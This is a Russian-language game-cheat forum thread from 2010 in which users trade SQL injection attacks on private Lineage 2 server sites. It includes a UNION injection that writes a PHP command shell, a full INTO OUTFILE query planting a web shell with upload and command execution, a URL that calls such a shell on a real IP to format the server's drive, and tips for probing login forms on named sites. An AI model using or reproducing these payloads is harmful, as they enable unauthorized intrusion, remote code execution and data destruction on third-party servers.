SQL инъекция - Баги и читы Lineage 2 - Уязвимости, баги и читы для Lineage 2 в этом разделе
15.02.2010, 18:58
#16
Разведчик
Регистрация: 27.08.2009
Сообщений: 5
Популярность: 14
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 1 сообщении
Re: SQL инъекция
[Ссылки могут видеть только зарегистрированные пользователи. ]
некак немогу подобрать может у вас получиться
15.02.2010, 19:53
#17
Разведчик
Регистрация: 27.11.2009
Сообщений: 15
Популярность: 54
Сказал(а) спасибо: 11
Поблагодарили 22 раз(а) в 10 сообщениях
Re: SQL инъекция
Кол-во полей 12
Дальше не ушел....
________________
Сливаю хайды с АЧ за что нить интересное)
15.02.2010, 20:59
#18
Разведчик
Регистрация: 07.02.2010
Сообщений: 31
Популярность: 26
Сказал(а) спасибо: 47
Поблагодарили 8 раз(а) в 6 сообщениях
Re: SQL инъекция
Похоже что нет прав на создание/запись файла, т.к. это запрос проходит:
sdfasd'union select null,null,null,null,null,null,null,null,null,null, null,null'<?php passthru($_GET["cmd"]); ?>'#
15.02.2010, 23:25
#19
Пехотинец
Регистрация: 01.09.2009
Сообщений: 64
Популярность: 331
Сказал(а) спасибо: 35
Поблагодарили 166 раз(а) в 42 сообщениях
Re: SQL инъекция
Цитата:
Через базу - не вариант, почти ниодин шелл не заливает
Вот такой запрос сделай, он создаст шелл по указанному пути с возможностью аплоада файлов.
Код:
select '<html> <head> <title>uploader</title>',
'<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">',
'<style type="text/css"> </style> </head>',
'<body bgcolor="#999999" text="#000000">',
'<center> <table width="700" border="0" bgcolor="#000066">',
'<tr> <td> <table width="100%" border="0" bgcolor="#CCCCCC"> <tr> <td>',
'<p><font size="2"><b><font color="#FF0000"> System: ',
'<font color="#000000"> ',
'<?php passthru("uname -a"); ?>',
'</font><br>',
' Our permissions: <font color="#000000"> ',
'<?php passthru("id"); ?>',
'</font><br>',
' Our locality: <font color="#000000"> ',
' <?php passthru("pwd"); ?>',
'</font></font></b></font></p>',
'<pre> <?php $uploaded = $_FILES[''userfile''][''tmp_name''];',
'if (file_exists($uploaded)) {' ,
' $pwd_dir = $_POST[''dira''];',
'$real = $_FILES[''userfile''][''name'']; ',
'$destination = $pwd_dir."/".$real;',
'copy($uploaded, $destination);',
'echo "Uploaded process:";',
'print_r ($_FILES); ',
'echo "FILE UPLOADED TO $destination";',
'} else {',
'echo " No file uploaded"; }?>',
'</pre> <form name="form1" method="post" enctype="multipart/form-data">',
'<table width="100%" border="0"> <tr> ',
'<td width="35%"><font size="2"><b> Browse file to upload:</b></font></td>',
'<td width="65%">' ,
'<input type="file" name="userfile" size="45">',
'</td> </tr> <tr>',
'<td width="35%"><b><font size="2"> Destination:</font></b></td>',
'<td width="65%"> ',
'<input type="text" name="dira" size="45" value="<?php passthru("pwd"); ?>">',
'<input type="submit" name="submit2" value="upload">',
'</td> </tr> <tr> <td width="35%">',
'<div align="right"> </div> </td>',
'<td width="65%"> </td> </tr> <tr>',
'<td width="35%"><b><font size="2"> Command to execute:</font></b></td>',
'<td width="65%">',
'<input type="text" name="cmd" size="45" value="<?php echo $_POST[''cmd'']; ?>">',
'<input type="submit" name="submit" value="execute"> </td> </tr> <tr>' ,
'<td width="35%"> <div align="right"> </div> </td>',
'<td width="65%"> </td> </tr> </table> </form> <p> <pre>',
'<?php if ($_POST[''cmd'']){ $cmd = $_POST[''cmd''];',
'echo "$cmd executed...<br>"; passthru("$cmd"); }',
' else { echo "No shell command executed"; } ?></pre>',
'<div align="right"> <font size="1"><b>2003 © </b></font> </div>',
'</td> </tr> </table> </td> </tr> </table> </center> </body> </html>' into outfile
'тут полный путь к файлу с обратными слешами, например c:/shell/shell.php'
21.02.2010, 20:56
#20
Пехотинец
Регистрация: 18.04.2009
Сообщений: 74
Популярность: -165
Сказал(а) спасибо: 19
Поблагодарили 221 раз(а) в 76 сообщениях
Re: SQL инъекция
21.02.2010, 21:08
#21
Лейтенант-командор
Регистрация: 17.07.2009
Сообщений: 683
Популярность: 11669
Золото Zhyk.Ru: 100
Сказал(а) спасибо: 567
Поблагодарили 1,011 раз(а) в 383 сообщениях
Re: SQL инъекция
________________
подполье Аион -
для суровых подпольщиков
Восстановлена работоспособность одного из лучших радаров для Аион. Спасибо автору(ам) =)
Path of Exile - в настоящее время там.
21.02.2010, 21:31
#22
Пехотинец
Регистрация: 09.12.2009
Сообщений: 60
Популярность: 234
Сказал(а) спасибо: 25
Поблагодарили 112 раз(а) в 59 сообщениях
Re: SQL инъекция
Warning: Invalid argument supplied for foreach() in /home/killer245/domains/l2justgame.com/public_html/components/com_content/models/frontpage.php on line 104
с такой ошибкой дальше можно как то продвинутся?
23.02.2010, 19:08
#23
Рыцарь-защитник
Регистрация: 28.08.2009
Сообщений: 603
Популярность: 19129
Золото Zhyk.Ru: 500
Сказал(а) спасибо: 84
Поблагодарили 602 раз(а) в 321 сообщениях
Re: SQL инъекция
Некропостер
Действовал по гайду бачи, не получилось
, иммено при заливке шелла
________________
We are Ducks. We are birds. We like bread. We cryack. Cryack.
02.03.2010, 18:55
#24
Пехотинец
Регистрация: 05.12.2009
Сообщений: 76
Популярность: 80
Сказал(а) спасибо: 90
Поблагодарили 227 раз(а) в 120 сообщениях
Re: SQL инъекция
[Ссылки могут видеть только зарегистрированные пользователи. ]
дальше в лом стало. кому интересно- копайтесь
02.03.2010, 19:19
#25
Разведчик
Регистрация: 31.08.2009
Сообщений: 6
Популярность: 46
Сказал(а) спасибо: 0
Поблагодарили 23 раз(а) в 5 сообщениях
Re: SQL инъекция
Цитата:
Да вайп ему нах:
Код:
http://64.186.132.15/acm/class.php?cmd=format%20c:%20/q
ну и в обьеденение && y
03.03.2010, 19:35
#26
Разведчик
Регистрация: 03.03.2010
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Re: SQL инъекция
а если ошибки не вылазят, после захода? тогда невозможно продлжить?
(тоесть нет локального адреса папки acm)
03.03.2010, 19:54
#27
Пехотинец
Регистрация: 01.09.2009
Сообщений: 64
Популярность: 331
Сказал(а) спасибо: 35
Поблагодарили 166 раз(а) в 42 сообщениях
Re: SQL инъекция
В поле логина введи adgasdga'
Обязательно с ковычкой на конце. Иногда ошибок не видно из за черного фона. Иногда ошибки просто не возвращаются. Попробуй подставлять заведомо неправильные данные в другие пхп скрипты.
03.03.2010, 20:07
#28
Разведчик
Регистрация: 20.02.2010
Сообщений: 4
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Re: SQL инъекция
Есть сайт но не могу подключиться к базе
В конфиге выставлено что все подключения только с локалхоста...Что можно с этим сделать?
03.03.2010, 20:10
#29
Разведчик
Регистрация: 03.03.2010
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Re: SQL инъекция
ht_tp://www.l2athebaldt.com/acm/index.php?act=account
dsafasd'union select 1,2,3,4,5,6,7,8#
я пробовал все что ты писал, так же заведомо неправильные данные, ошибки не выводит. так же на многих серверах такой трабл.
на l2appeal что ты описал закрыли этот баг. (походу)
лишь на одном сервере выдало.. и то не добавляется class.php(
Последний раз редактировалось f1la; 03.03.2010 в 20:49 .
03.03.2010, 21:14
#30
Пехотинец
Регистрация: 01.09.2009
Сообщений: 64
Популярность: 331
Сказал(а) спасибо: 35
Поблагодарили 166 раз(а) в 42 сообщениях
Re: SQL инъекция
[Ссылки могут видеть только зарегистрированные пользователи. ]
Последний раз редактировалось 6a4a; 03.03.2010 в 21:19 .
Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
HTML код Выкл.
Похожие темы
Тема
Автор
Раздел
Ответов
Последнее сообщение
[Уязвимость] [VIP] Инъекция некоторых птс
Hummel
Подполье Lineage 2 (0 уровень)
0
22.11.2008 19:01
Заявление об ответственности / Список мошенников
Часовой пояс GMT +4, время: 10:14 .